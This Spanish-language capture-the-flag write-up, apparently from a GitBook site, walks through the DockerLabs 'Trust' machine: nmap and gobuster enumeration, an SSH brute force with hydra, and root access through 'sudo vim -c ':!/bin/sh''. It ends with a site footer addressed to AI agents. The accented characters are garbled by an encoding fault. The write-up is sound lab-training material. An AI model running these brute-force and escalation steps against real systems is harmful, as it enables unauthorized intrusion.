# Trust ### 馃攳 **RECONOCIMIENTO** En primer lugar, tras conectarnos a la m谩quina, utilizamos el comando: ```bash ping -c 1 172.22.0.2 ``` para verificar la conectividad de red.
A continuaci贸n, se realiza el comando: ```bash nmap -p- --open -sT --min-rate 5000 -vvv -n -Pn 172.22.0.2 -oG allPorts ``` para realizar un escaneo de puertos y servicios detallado en la direcci贸n IP. ![](/files/LgYQM95GpoboukSabs1e) Como podemos observar durante el escaneo que el **puerto 22** perteneciente al **servicio SSH** y el **puerto 80** perteneciente al **servicio HTTP** est谩n abiertos por lo que a continuaci贸n se indagar谩 m谩s. ### 馃攷 **EXPLORACI脫N** Se utiliza el comando: ```bash sudo nmap -sCV -p22,80 -v 172.22.0.2 ``` para obtener m谩s informaci贸n sobre esos puertos espec铆ficamente.
Seguimos indagando m谩s sobre los puertos y ahora indagaremos sobre el **servicio HTTP**. Se ingres贸 la **direcci贸n IP** en el navegador lo que llev贸 a que la p谩gina web sea un formulario de iniciar sesi贸n. ![](/files/fxWFY4v4LLB0gGHHTb08) Ahora, buscamos directorios con la herramienta **Gobuster** a trav茅s del comando: ```bash gobuster dir -u http://172.22.0.2/ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -t 20 -x html,php,txt,js ```
Vemos que hay dos directorios con estado **200**, lo que significa que la solicitud realizada por el cliente fue exitosa. Procederemos a investigar m谩s sobre estos directorios.
### 馃殌 **EXPLOTACI脫N** Con la informaci贸n obtenida anteriormente, realizamos el comando: ```bash hydra -l mario -P /usr/share/wordlists/rockyou.txt ssh://172.22.0.2 -t 5 ``` Este comando utiliza la herramienta **Hydra** para realizar un ataque de fuerza bruta contra el servicio SSH de una m谩quina con la IP **172.22.0.2**.
Al realizar el ataque de fuerza bruta, descubrimos la contrase帽a de **mario**. Sabiendo esto, nos conectamos a trav茅s de SSH al usuario con el comando: ```bash ssh mario@172.22.0.2 ```
### 馃攼 **PRIVILEGIOS** Al estar dentro y ejecutar: ```bash whoami ``` a煤n no somos **root**, por lo que ejecutamos: ```bash sudo -l ``` para ver si hay algo que podamos explotar. ![](/files/fKE3vg4NdrQ7E9iZATkz) Observamos que podemos escalar privilegios con **vim** utilizando el comando: ```bash sudo vim -c ':!/bin/sh' ``` Tras eso, ejecutamos: ```bash whoami ``` y confirmamos que ya somos **root**.
--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://beafn28.gitbook.io/beafn28/writeups/dockerlabs/trust.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.